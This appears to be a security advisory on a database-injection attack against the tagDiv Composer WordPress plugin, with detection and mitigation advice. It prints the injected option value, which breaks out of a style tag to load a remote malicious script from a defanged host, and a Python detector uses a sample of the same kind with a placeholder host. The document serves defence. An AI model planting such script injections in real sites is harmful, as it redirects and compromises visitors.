A vulnerability has been discovered in tagDiv Composer, a plugin bundled with the WordPress Newspaper theme, that allows the site's database to be rewritten.


Characteristics of the malware

This malware writes the following string to the key td_live_css_local_storage in the wp_options table in the database.

*Some parts are enclosed in brackets for safety.

a:2:{i:0;s:0:\"\";s:3:\"css\";s:175:\".stepkokkmnkivhrwppnn{} .step4636435346{}</style><script>var a=1;var b=2;var c=4;</script><script src='https://four.startperfectsolutions[.]com/scripts/sold.js\'></script><style>\"}

This string is output in the site header, and visitors are then forcibly redirected to another site.

The script at startperfectsolutions[.]com/scripts/sold.js is the body of the malware. Once the injected tag loads it on the site, it performs the redirect hack and other malicious behavior.

How to deal with malware

This is a very rare type of malware that writes to the database.
The key td_live_css_local_storage is a key created by the tagDiv Composer plugin, so it probably exploits a vulnerability in this plugin.

[Free] WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].

However, there are various patterns of malware database modification, and if the pattern has not yet been added to our database, the plugin may not be able to detect it.

In this case, it is necessary to issue SQL statements directly to the database to check the malware infection status.

Example of SQL statement
select option_value from wp_options where option_name = 'td_live_css_local_storage'; 
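
As an added example (not code from this page, from tagDiv, or from any scanner plugin), the following Python takes the value returned by the query above, walks its PHP-serialized strings by their declared byte lengths, and flags any that contain </style> or <script>, listing the script sources it finds. The function names and both sample values are constructed for illustration, and the host in the sample is a placeholder.

```python
import re

# Markup that has no business inside a stored CSS string.
BREAKOUT = re.compile(rb"</style|<script", re.I)
SCRIPT_SRC = re.compile(rb"<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
# s:N:" header; the optional backslash tolerates dump-style \" escaping.
STR_HEADER = re.compile(rb's:(\d+):\\?"')

def serialized_strings(value: str) -> list:
    """Return every s:N:"..." payload, honouring the declared byte length N."""
    data = value.encode("utf-8")
    out, pos = [], 0
    while (m := STR_HEADER.search(data, pos)):
        length = int(m.group(1))
        body = data[m.end():m.end() + length]
        if len(body) < length:        # truncated or tampered value: stop parsing
            break
        out.append(body)
        pos = m.end() + length        # skip the body so its contents are not re-parsed
    return out

def inspect_option(value: str) -> dict:
    """Flag a td_live_css_local_storage value whose strings contain HTML/script."""
    suspicious, sources = [], []
    for s in serialized_strings(value):
        if BREAKOUT.search(s):
            suspicious.append(s.decode("utf-8", "replace"))
            sources += [u.decode("utf-8", "replace") for u in SCRIPT_SRC.findall(s)]
    return {"infected": bool(suspicious), "strings": suspicious, "script_src": sources}

# Constructed samples (not taken from a real site); the host is a placeholder.
CSS_BAD = (".step1{}</style><script src='https://cdn.example.invalid/x.js'>"
           "</script><style>")
INFECTED = 'a:2:{i:0;s:0:"";s:3:"css";s:%d:"%s";}' % (len(CSS_BAD), CSS_BAD)
CLEAN = 'a:1:{s:3:"css";s:22:".td-header{color:red;}";}'

if __name__ == "__main__":
    for name, val in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, inspect_option(val))
```

Any value it flags should be reviewed by hand before the option is cleaned, and the script sources it lists can be matched against web server or proxy logs.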

Update or stop using tagDiv Composer

Since multiple vulnerabilities have been reported in tagDiv Composer, please consider stopping the use of tagDiv Composer if you are unable to update it.

The vulnerability mentioned above can be prevented by commenting out the part of the plugin that writes some settings to the database, as shown below, but this may limit the functionality of the plugin since the plugin settings cannot be saved.

File \wp-content\plugins\td-composer\css-live\includes\td_live_css_storage.php
*Adding // at the beginning of the line comments it out, which stops this code from running and prevents the database from being rewritten.

//update_option('td_live_css_local_storage', self::$local_storage);